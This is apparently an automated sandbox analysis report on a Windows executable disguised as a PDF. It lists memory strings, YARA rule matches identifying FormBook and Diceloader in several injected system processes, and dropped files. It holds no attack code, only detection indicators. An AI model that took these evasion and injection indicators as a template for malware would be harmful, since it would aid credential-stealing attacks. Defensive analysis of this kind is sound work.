Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: 101 2043 5770 pdf.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2357342046.00007FF6802A2000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ipconfig.exe, 00000009.00000003.2215032606.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601846350.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000007.00000002.4595914565.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrv.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
